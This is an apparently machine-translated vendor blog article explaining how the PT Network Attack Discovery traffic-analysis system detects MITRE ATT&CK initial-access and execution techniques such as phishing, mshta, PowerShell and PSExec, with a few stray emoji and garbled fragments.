🥗 🧒🏻 🌃 How Traffic Analysis Systems Detect MITER ATT & CK Hacker Tactics Using PT Network Attack Discovery 🏜️ 💍 🔕

According to Verizon , most (87%) information security incidents occur in minutes, and it takes months for 68% of companies to detect them. This is confirmed by the Ponemon Institute study , according to which most organizations take an average of 206 days to detect an incident. According to the experience of our investigations, hackers can control the company's infrastructure for years and not be detected. So, in one of the organizations where our experts investigated the IS incident, it was revealed that hackers completely controlled the entire infrastructure of the organization and regularly stole important information for eight years .

Suppose you already have SIEM running, which collects logs and analyzes events, and antiviruses are installed on the end nodes. Nonetheless,not everything can be detected using SIEM , just as it is impossible to implement EDR systems on the entire network, which means that blind spots cannot be avoided. Network traffic analysis (NTA) systems help to cope with them. These decisions reveal the activity of attackers at the earliest stages of penetrating the network, as well as during attempts to gain a foothold and develop an attack within the network.

There are two types of NTAs: some work with NetFlow, the second analyze raw traffic. The advantage of the second systems is that they can store raw traffic records. Thanks to this, the information security specialist can verify the success of the attack, localize the threat, understand how the attack occurred and how to prevent a similar one in the future.

We will show how with the help of NTA it is possible, by direct or indirect signs, to identify all known attack tactics described in the MITER ATT & CK knowledge base . We will talk about each of the 12 tactics, analyze the techniques that are detected by traffic, and demonstrate their detection using our NTA-system.

About the ATT & CK Knowledge Base

MITER ATT & CK is a public knowledge base developed and maintained by MITRE Corporation based on analysis of real APTs. It is a structured set of tactics and techniques used by attackers. This allows information security professionals from all over the world to speak the same language. The base is constantly expanding and updated with new knowledge.

In the database, 12 tactics are distinguished, which are divided by the stages of a cyber attack:

initial access
execution
consolidation (persistence);
privilege escalation
detection prevention (defense evasion);
obtaining credential access;
intelligence (discovery);
movement within the perimeter (lateral movement);
data collection (collection);
management and control (command and control);
exfiltration;
impact

For each tactic, the ATT & CK knowledge base lists a list of techniques that help attackers achieve their goals at the current stage of the attack. Since the same technique can be used at different stages, it can relate to several tactics.

The description of each technique includes:

identifier;
list of tactics in which it is applied;
examples of use by APT groups;
measures to reduce damage from its use;
detection recommendations.

Information security specialists can use knowledge from the database to structure information about current attack methods and, with this in mind, build an effective security system. Understanding how real APT groups operate, including can be a source of hypotheses for a proactive search for threats in the framework of threat hunting .

About PT Network Attack Discovery

We will identify the use of techniques from the ATT & CK matrix using the PT Network Attack Discovery system - Positive Technologies NTA-system designed to detect attacks on the perimeter and inside the network. PT NAD to varying degrees covers all 12 tactics of the MITER ATT & CK matrix. He is most powerful in identifying techniques for initial access, lateral movement, and command and control. In them, PT NAD covers more than half of the known techniques, revealing their use by direct or indirect signs.

The system detects attacks using ATT & CK techniques using the detection rules created by the PT Expert Security Center team(PT ESC), machine learning, indicators of compromise, in-depth analytics and retrospective analysis. Real-time traffic analysis in combination with a retrospective allows you to identify current hidden malicious activity and track the development vectors and attack history.

Here is the full mapping of PT NAD to the MITER ATT & CK matrix. The picture is large, so we suggest you consider it in a separate window.

Initial access

The tactics of obtaining initial access includes techniques for penetrating the company’s network. The goal of attackers at this stage is to deliver malicious code to the attacked system and to ensure the possibility of its further execution.

Traffic analysis with PT NAD reveals seven techniques for gaining initial access:

1. T1189 : drive-by compromise

A technique in which a victim opens a website that is used by cybercriminals to operate a web browser and obtain access tokens for an application.

What PT NAD does : If the web traffic is not encrypted, PT NAD inspects the contents of the HTTP server responses. It is in these answers that there are exploits that allow attackers to execute arbitrary code inside the browser. PT NAD automatically detects such exploits using detection rules.

Additionally, PT NAD detects a threat in the previous step. The rules and indicators of compromise are triggered if a user visits a site that redirects him to a site with a bunch of exploits.

2. T1190 : exploit public-facing application

Exploiting vulnerabilities in services that are accessible from the Internet.

What PT NAD does : performs a deep inspection of the contents of network packets, revealing signs of abnormal activity in it. In particular, there are rules that allow you to detect attacks on the main content management system (CMS), web interfaces of network equipment, attacks on mail and FTP servers.

3. T1133 : external remote services

The use of remote access services by attackers to connect to internal network resources from outside.

What PT NAD does : since the system recognizes protocols not by port numbers, but by the contents of packets, users of the system can filter traffic so that they can find all sessions of remote access protocols and check their legitimacy.

4. T1193 : spearphishing attachment

We are talking about the notorious phishing attachments.

What PT NAD does : Automatically extracts files from traffic and checks them against compromise indicators. Executable files in attachments are detected by rules that analyze the contents of mail traffic. In a corporate environment, such an investment is considered abnormal.

5. T1192 : spearphishing link

Using phishing links. The technique involves sending phishing emails by a malicious user with a link that, when clicked, downloads a malicious program. Typically, the link is accompanied by text compiled in accordance with all the rules of social engineering.

What PT NAD does : detects phishing links using compromise indicators. For example, in the PT NAD interface we see a session in which there was an HTTP connection using a link listed in the phishing-urls list.

Linking from the list of indicators of compromise phishing-urls

6. T1199 : trusted relationship

Access to the victim’s network through third parties with whom the victim has a trusted relationship. Attackers can hack into a trusted organization and connect through it to the target network. To do this, they use VPN connections or domain trusts, which can be detected using traffic analysis.

What PT NAD does : it parses application protocols and saves the parsed fields to the database, so the IB analyst can use the filters to find all suspicious VPN connections or cross-domain connections in the database.

7. T1078 : valid accounts

Use of standard, local or domain credentials for authorization on external and internal services.

What PT NAD does : automatically extracts credentials from HTTP, FTP, SMTP, POP3, IMAP, SMB, DCE / RPC, SOCKS5, LDAP, Kerberos. In general, this is a username, password and a sign of authentication success. If they were used, they are displayed in the corresponding session card.

Execution

Execution tactics include techniques that cybercriminals use to execute code on compromised systems. Running malicious code helps attackers consolidate their presence (persistence tactics) and expand access to remote systems on the network by moving within the perimeter.

PT NAD can detect the use by attackers of 14 techniques used to execute malicious code.

1. T1191 : CMSTP (Microsoft Connection Manager Profile Installer)

A tactic in which attackers prepare a special malicious installation INF file for the CMSTP.exe utility (the connection manager profile installer) built into Windows. CMSTP.exe takes the file as a parameter and sets the service profile for a remote connection. As a result, CMSTP.exe can be used to download and execute dynamically connected libraries (* .dll) or scriptlets (* .sct) from remote servers.

What PT NAD does : it automatically detects the transmission of special .inf files in HTTP traffic. In addition to this, it detects the transfer of malicious scriptlets and dynamically connected libraries via the HTTP protocol from a remote server.

2. T1059 : command-line interface

Interaction with the command line interface. You can interact with the command line interface locally or remotely, for example using remote access utilities.

What PT NAD does : it automatically detects the presence of shells by responding to commands to launch various command-line utilities, such as ping, ifconfig.

3. T1175 : component object model and distributed COM

Using COM or DCOM technologies to execute code on local or remote systems when moving through a network.

What PT NAD does : detects suspicious DCOM calls that attackers usually use to run programs.

4. T1203 : exploitation for client execution

Exploiting vulnerabilities to execute arbitrary code on a workstation. The most useful exploits for attackers are those that allow code to be executed on a remote system, since with their help attackers can gain access to such a system. The technique can be implemented using the following methods: malicious mailing list, website with browser exploits and remote exploitation of application vulnerabilities.

What PT NAD does : while parsing mail traffic, PT NAD checks it for executable files in the attachment. Automatically extracts office documents from letters in which there may be exploits. Attempts to exploit vulnerabilities are visible in the traffic that PT NAD detects automatically.

5. T1170 : mshta

Using the mshta.exe utility, which runs Microsoft HTML applications (HTA) with the .hta extension. Since mshta processes files bypassing browser security settings, attackers can use mshta.exe to execute malicious HTA, JavaScript, or VBScript files.

What PT NAD does : .hta files for execution through mshta are transmitted including over the network - this is visible in the traffic. PT NAD detects the transfer of such malicious files automatically. It captures files, and information about them can be viewed in the session card.

6. T1086 : PowerShell

Using PowerShell to search for information and execute malicious code.

What PT NAD does : When PowerShell is used remotely by attackers, PT NAD detects this using rules. It discovers PowerShell keywords that are most often used in malicious scripts, and transfers PowerShell scripts using the SMB protocol.

7. T1053 : scheduled task
Use the Windows task scheduler and other utilities to automatically launch programs or scripts at a specific time.

What does PT NAD do?: attackers create such tasks, usually remotely, which means that such sessions are visible in traffic. PT NAD automatically detects suspicious task creation and modification operations using the ATSVC and ITaskSchedulerService RPC interfaces.

8. T1064 : scripting

Executing scripts to automate various attacking actions.

What PT NAD does : it reveals the facts of script transmission over the network, that is, even before they are launched. It detects the content of scripts in raw traffic and detects the transfer of files over the network with extensions corresponding to popular scripting languages.

9. T1035 : service execution

Run an executable file, command line interface instructions, or a script by interacting with Windows services, such as a Service Control Manager (SCM).

What PT NAD does : inspects SMB traffic and detects SCM access to the rules for creating, modifying, and starting a service.

The technique of starting services can be implemented using the utility for remote execution of PSExec commands. PT NAD parses the SMB protocol and detects the use of PSExec when it uses the PSEXESVC.exe file or the standard PSEXECSVC service name to execute code on a remote machine. The user needs to check the list of executed commands and the legitimacy of the remote execution of commands from the node.

PT NAD ATT&CK, , , .

PSExec,

10. T1072: third-party software

A technique in which attackers gain access to remote administration software or a corporate software deployment system and use them to launch malicious code. Examples of such software: SCCM, VNC, TeamViewer, HBSS, Altiris.
By the way, the technique is especially relevant in connection with the massive transition to remote work and, as a result, the connection of numerous home insecure devices through questionable remote access channels.

What does PT NAD do?: Automatically detects the operation of such software on the network. For example, the rules are triggered by the facts of the VNC connection and the activity of the EvilVNC trojan, which secretly installs the VNC server on the victim’s host and automatically starts it. PT NAD also automatically detects the TeamViewer protocol, this helps the analyst use the filter to find all such sessions and verify their legitimacy.

11. T1204 : user execution

A technique in which a user runs files that can lead to code execution. This can be, for example, if he opens an executable file or runs an office document with a macro.

What PT NAD does : sees such files at the transfer stage, before they are launched. Information about them can be studied in the card sessions, in which they were transmitted.

12. T1047 : Windows Management Instrumentation

Using the WMI tool, which provides local and remote access to Windows system components. Using WMI, attackers can interact with local and remote systems and perform many tasks, for example, collecting information for reconnaissance purposes and remotely starting processes during horizontal movement.

What PT NAD does : since interactions with remote systems via WMI are visible in traffic, PT NAD automatically detects network requests for establishing WMI sessions and checks the traffic for transmission of scripts that use WMI.

13. T1028 : Windows Remote Management

Using the Windows service and protocol, which allows the user to interact with remote systems.

What PT NAD does : sees network connections established using Windows Remote Management. Such sessions are detected automatically by the rules.

14. T1220 : XSL (Extensible Stylesheet Language) script processing

The XSL markup language is used to describe the processing and visualization of data in XML files. To support complex operations, the XSL standard includes support for embedded scripts in multiple languages. These languages allow arbitrary code to be executed, which leads to bypass security policies based on whitelists.

What PT NAD does : it reveals the facts of transferring such files over the network, that is, even before they are launched. It automatically detects the fact that XSL files are transmitted over the network and files with anomalous XSL markup.

In the following articles, we will look at how the PT Network Attack Discovery NTA-system finds other tactics and techniques of attackers in accordance with MITER ATT & CK. Stay tuned!

Authors :

, (PT Expert Security Center) Positive Technologies
, Positive Technologies

How Traffic Analysis Systems Detect MITER ATT & CK Hacker Tactics Using PT Network Attack Discovery